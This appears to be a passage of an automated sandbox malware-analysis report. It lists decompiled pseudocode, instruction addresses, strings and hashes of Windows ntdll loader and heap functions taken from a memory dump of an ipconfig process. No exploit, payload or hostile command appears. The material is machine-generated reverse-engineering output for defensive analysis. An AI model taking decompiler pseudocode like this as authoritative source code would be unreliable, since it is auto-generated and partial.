              0x02ec8e29
              0x02ec8e2c
              0x02ec8e38
              0x02ec8e3e
              0x02ec8e43
              0x02ec8eb5
              0x02ec8eb9
              0x02f092aa
              0x02f092af
              0x02f092e8
              0x02f092e8
              0x02f092af
              0x02ec8eb9
              0x02ec8e45
              0x02ec8e53
              0x02ec8e5b
              0x02ec8e5f
              0x02ec8e78
              0x02ec8e78
              0x02ec8e7d
              0x02ec8ec3
              0x02ec8ecd
              0x02ec8ed2
              0x02ec8ed2
              0x02ec8ec5
              0x02ec8ec5
              0x00000000
              0x02ec8e7d
              0x02ec8e67
              0x02ec8ea4
              0x02f0931a
              0x00000000
              0x00000000
              0x02f09320
              0x02ec8ea4
              0x02ec8e70
              0x02f09325
              0x02f09340
              0x02f09345
              0x02f09345
              0x02ec8e76
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              Strings
              • minkernel\ntdll\ldrsnap.c, xrefs: 02F0933B, 02F09367
              • Querying the active activation context failed with status 0x%08lx, xrefs: 02F09357
              • LdrpFindDllActivationContext, xrefs: 02F09331, 02F0935D
              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02F0932A
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
              • API String ID: 0-3779518884
              • Opcode ID: 04cedb8af7a79191e09c922d4c96f358942d7b756a1ae215e11234cd03579b70
              • Instruction ID: be3ad382f4c1a19b3f309da8c4f7cff762036ebefdb8c2b776e58d5bc871f7bd
              • Opcode Fuzzy Hash: 04cedb8af7a79191e09c922d4c96f358942d7b756a1ae215e11234cd03579b70
              • Instruction Fuzzy Hash: AB415CB2EC03199FEB36EAD48F88B79F375AB4068CF25E56DE80457191E7706C81C681
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F549A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 0-336120773
              • Opcode ID: 79e334f7667d4628a7bff6987214c45daef354b5b51355b72cae15364eb3b486
              • Instruction ID: 4cb28a5ca52a0c9ca3f0caa52c7d7a39679fc28005b31f00313a877b63b98f4f
              • Opcode Fuzzy Hash: 79e334f7667d4628a7bff6987214c45daef354b5b51355b72cae15364eb3b486
              • Instruction Fuzzy Hash: A4312931680120EFD750DF54D885FAB73A9FF01798F15855AFA0ACB250D770A9C0DE64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E02EA8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E02EA934A() != 0) {
								_t159 = E02F1A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x2f85780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x2f85780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E02EA849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E02EA8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E02EA8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x2f85c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x2f85c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E02EB2280(_t92, 0x2f886cc);
															_t94 = E02F69DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E02EC61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x2f85c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E02EA8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x2f85c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x2f85c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E02EDF380(_t136, 0x2e71184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E02EB2280(_t108, 0x2f886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E02EC61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E02F69D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E02EAFFB0(_t118, _t156, 0x2f886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E02ED9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































              0x02ea8799
              0x02ea879d
              0x02ea87a1
              0x02ea87a3
              0x02ea87a8
              0x02ea87c3
              0x02ea87c3
              0x02ea87c8
              0x02ea87d1
              0x02ea87d4
              0x02ea87d8
              0x02ea87e5
              0x02ea87ec
              0x02ef9bfe
              0x02ef9c00
              0x02ef9c02
              0x02ef9c08
              0x02ef9c0d
              0x02ef9c0f
              0x02ef9c14
              0x02ef9c2d
              0x02ef9c32
              0x02ef9c37
              0x02ef9c3a
              0x02ef9c3c
              0x02ef9c42
              0x02ef9c42
              0x02ef9c3c
              0x02ef9c02
              0x02ea87da
              0x02ea87df
              0x02ea87e3
              0x00000000
              0x00000000
              0x02ea87e3
              0x02ea87f2
              0x00000000
              0x02ea87fb
              0x02ea87fd
              0x02ea87fe
              0x02ea880e
              0x02ea880f
              0x02ea8810
              0x02ea8814
              0x02ea881a
              0x02ea881c
              0x02ea881f
              0x02ea8821
              0x02ea8822
              0x02ea8824
              0x02ea8826
              0x02ea882c
              0x02ea882e
              0x02ef9c48
              0x02ef9c48
              0x02ea8834
              0x02ea8834
              0x02ea8837
              0x00000000
              0x00000000
              0x02ea8837
              0x02ea882e
              0x02ea883d
              0x02ea8840
              0x02ea8843
              0x02ea8846
              0x02ea8849
              0x02ea884c
              0x02ea884e
              0x02ea8850
              0x02ea8852
              0x02ea8854
              0x02ea8857
              0x02ea88b4
              0x02ea88b6
              0x02ea88b6
              0x02ea8859
              0x02ea8859
              0x02ea8859
              0x02ea8861
              0x02ea8866
              0x02ea886a
              0x02ea893d
              0x02ea8941
              0x00000000
              0x02ea8947
              0x02ea8947
              0x02ea894a
              0x02ea894c
              0x00000000
              0x02ea8952
              0x02ea8955
              0x02ea895a
              0x02ea895d
              0x02ea895d
              0x02ea895f
              0x02ea8961
              0x02ea8961
              0x02ea8968
              0x00000000
              0x00000000
              0x02ea896a
              0x02ea896b
              0x02ea896e
              0x00000000
              0x02ea8970
              0x02ea8970
              0x02ea8970
              0x02ea8970
              0x02ea8972
              0x02ea8972
              0x02ea8974
              0x00000000
              0x02ea897a
              0x02ea897a
              0x02ea897d
              0x00000000
              0x02ea8983
              0x02ef9c65
              0x02ef9c6d
              0x02ef9c72
              0x02ef9c75
              0x02ef9c75
              0x02ef9c82
              0x02ef9c86
              0x02ef9c87
              0x02ef9c88
              0x02ef9c89
              0x02ef9c8c
              0x02ef9c90
              0x02ef9c95
              0x02ef9c97
              0x02ef9ca0
              0x02ef9ca3
              0x02ef9ca9
              0x02ef9ca9
              0x00000000
              0x02ef9ca9
              0x02ef9ca3
              0x00000000
              0x02ef9c97
              0x02ea897d
              0x00000000
              0x02ea8974
              0x02ea8988
              0x02ea8992
              0x02ea8996
              0x00000000
              0x02ea8996
              0x02ea894c
              0x00000000
              0x02ea8870
              0x02ea887b
              0x02ea887d
              0x02ea887f
              0x02ea8881
              0x02ea8884
              0x02ea8884
              0x02ea8886
              0x02ea8889
              0x02ea888c
              0x02ea888e
              0x02ea8891
              0x02ea8891
              0x02ea8898
              0x00000000
              0x00000000
              0x02ea889a
              0x02ea889b
              0x02ea889e
              0x00000000
              0x00000000
              0x02ea88a0
              0x02ea88a8
              0x02ea88b0
              0x02ea88b2
              0x02ea88d3
              0x02ea88d5
              0x00000000
              0x02ea88d7
              0x02ea88db
              0x02ea88dc
              0x02ea88e0
              0x02ea88e8
              0x02ea88ee
              0x02ea88f0
              0x02ea88f3
              0x02ea88fc
              0x02ea8901
              0x02ea8906
              0x02ea890c
              0x02ea890c
              0x02ea890f
              0x02ea8916
              0x02ea8917
              0x02ea8918
              0x02ea8919
              0x02ea891a
              0x02ea891f
              0x02ea8921
              0x02ef9c52
              0x02ef9c55
              0x02ef9c5b
              0x02ef9cac
              0x02ef9cc0
              0x02ef9cc0
              0x02ef9c55
              0x02ea8927
              0x02ea8927
              0x02ea892f
              0x02ea8933
              0x00000000
              0x02ea88f5
              0x02ea88f5
              0x00000000
              0x02ea88f7
              0x02ea88f7
              0x02ea88fa
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ea88fa
              0x02ea88f5
              0x02ea88f3
              0x00000000
              0x02ea88d5
              0x00000000
              0x02ea88b2
              0x02ea88c9
              0x00000000
              0x02ea88c9
              0x02ea887f
              0x02ea886a
              0x02ea8857
              0x02ea8852
              0x02ea88bf
              0x02ea88bf
              0x02ea87aa
              0x02ea87ad
              0x02ea87ae
              0x02ea87b4
              0x02ea87b5
              0x02ea87b6
              0x02ea87b8
              0x02ea87bd
              0x02ea87c1
              0x02ea87f4
              0x02ea87fa
              0x00000000
              0x00000000
              0x00000000
              0x02ea87c1
              0x00000000

              Strings
              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02EF9C18
              • minkernel\ntdll\ldrsnap.c, xrefs: 02EF9C28
              • LdrpDoPostSnapWork, xrefs: 02EF9C1E
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
              • API String ID: 0-1948996284
              • Opcode ID: 4ece42a86cebd24d8516a92ab5b0229f5e98d31e4716057724280c338236c90e
              • Instruction ID: 6e0e3d282e75eef0b2c3760d0c6de5d727e884e86e8bc2e459553cf478b12ba4
              • Opcode Fuzzy Hash: 4ece42a86cebd24d8516a92ab5b0229f5e98d31e4716057724280c338236c90e
              • Instruction Fuzzy Hash: 4891E571A80219DFDB18DF58C8A4ABAB7B6FF44318B95D069E945AF241DB30FD01CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E02EA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E02EACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E02E9C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x2f85780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E02F15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x2f85780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E02EB7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02EB7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E02F17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E02EB7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02EB7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E02F17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E02ECA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E02E9B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















              0x02ea7e4c
              0x02ea7e50
              0x02ea7e55
              0x02ea7e58
              0x02ea7e5d
              0x02ea7e71
              0x02ea7f33
              0x02ea7e77
              0x02ea7e77
              0x02ea7e79
              0x02ea7e79
              0x02ea7e7e
              0x02ea7f45
              0x02ef9848
              0x00000000
              0x02ef9848
              0x02ea7f4e
              0x02ea7f53
              0x02ea7f5a
              0x00000000
              0x00000000
              0x02ef985a
              0x02ef9862
              0x02ef9866
              0x00000000
              0x02ef986c
              0x00000000
              0x02ef986c
              0x02ea7e84
              0x02ea7e84
              0x02ea7e8d
              0x02ef9871
              0x02ea7eb8
              0x02ea7ec0
              0x02ea7ec0
              0x02ea7e9a
              0x02ef987e
              0x00000000
              0x00000000
              0x02ef9884
              0x02ef988b
              0x02ef98a7
              0x02ef98ac
              0x02ef98b1
              0x02ef98b6
              0x02ef98b8
              0x02ef98b8
              0x02ef98b9
              0x00000000
              0x02ef98b9
              0x02ea7ea0
              0x02ea7ea7
              0x00000000
              0x00000000
              0x02ea7eac
              0x02ea7eb1
              0x02ea7ec6
              0x02ea7ed0
              0x02ef98cc
              0x02ea7ed6
              0x02ea7ed6
              0x02ea7ed6
              0x02ea7ede
              0x02ea7ee3
              0x02ef98e3
              0x02ef98f0
              0x02ef9902
              0x02ef98f2
              0x02ef98fb
              0x02ef98fb
              0x02ef9907
              0x02ef991d
              0x02ef991d
              0x02ef9907
              0x02ef98e3
              0x02ea7ef0
              0x02ea7f14
              0x02ea7f14
              0x02ea7f1e
              0x02ef9946
              0x02ea7f24
              0x02ea7f24
              0x02ea7f24
              0x02ea7f2c
              0x02ef996a
              0x02ef9975
              0x02ef9975
              0x02ef997e
              0x02ef9993
              0x02ef9993
              0x02ef997e
              0x00000000
              0x02ea7ef2
              0x02ea7efc
              0x02ea7f0a
              0x02ea7f0e
              0x02ef9933
              0x00000000
              0x02ef9933
              0x00000000
              0x02ea7f0e
              0x00000000
              0x00000000
              0x00000000
              0x02ea7eb1

              Strings
              • minkernel\ntdll\ldrmap.c, xrefs: 02EF98A2
              • Could not validate the crypto signature for DLL %wZ, xrefs: 02EF9891
              • LdrpCompleteMapModule, xrefs: 02EF9898
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1676968949
              • Opcode ID: d5271ccecbfeb951ca065bfec10795d72ce6b9055f28cb437e07481544a9b3a4
              • Instruction ID: 7d7dd13b99b18324c7f8e56c56f74ceb846df74cb1ac9bb5cdd38f13e7bc01a8
              • Opcode Fuzzy Hash: d5271ccecbfeb951ca065bfec10795d72ce6b9055f28cb437e07481544a9b3a4
              • Instruction Fuzzy Hash: A75103316807849BEB21CB68C954B6ABBE4AF41318F14E59AE9919F7D2C730FD00CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E02E9E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E02E9F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E02ED95D0();
						}
						if(_t78 != 0) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E02EDFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E02EDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E02ED9600();
					if(_t97 < 0) {
						goto L6;
					}
					E02EDBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L02E9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E02EDBB40(_t83, _t102 + 0x24, _t78);
								if(L02EA43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E02EDBB40(_t84, _t102 + 0x24, _t94);
									if(L02EA43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































              0x02e9e620
              0x02e9e628
              0x02e9e62f
              0x02e9e631
              0x02e9e635
              0x02e9e637
              0x02e9e63e
              0x02ef5503
              0x02ef5503
              0x02e9e64c
              0x02e9e64c
              0x02e9e651
              0x00000000
              0x00000000
              0x02e9e661
              0x02e9e665
              0x02ef542a
              0x02e9e715
              0x02e9e71a
              0x02e9e71c
              0x02e9e720
              0x02e9e720
              0x02e9e727
              0x02e9e736
              0x02e9e736
              0x02e9e743
              0x02e9e743
              0x02e9e673
              0x02e9e678
              0x02e9e67d
              0x02e9e682
              0x02e9e685
              0x02e9e692
              0x02e9e69b
              0x02e9e6a3
              0x02e9e6ad
              0x02e9e6b1
              0x02e9e6b2
              0x02e9e6bb
              0x02e9e6bf
              0x02e9e6c0
              0x02e9e6c8
              0x02e9e6cc
              0x02e9e6d5
              0x02e9e6d9
              0x00000000
              0x00000000
              0x02e9e6e5
              0x02e9e6ea
              0x02e9e6f9
              0x02e9e70b
              0x02e9e70f
              0x02ef5439
              0x02ef545e
              0x02ef545e
              0x00000000
              0x02ef545e
              0x02ef543b
              0x02ef543e
              0x02ef5440
              0x02ef5445
              0x02ef5472
              0x02ef5475
              0x02ef548d
              0x02ef5493
              0x02ef54a9
              0x00000000
              0x00000000
              0x02ef54ab
              0x02ef54b4
              0x02ef54bc
              0x02ef54c8
              0x02ef54de
              0x02ef54fb
              0x02ef54e0
              0x02ef54e6
              0x02ef54eb
              0x02ef54eb
              0x02ef54de
              0x00000000
              0x02ef54bc
              0x02ef5477
              0x02ef547a
              0x02ef5480
              0x02ef5483
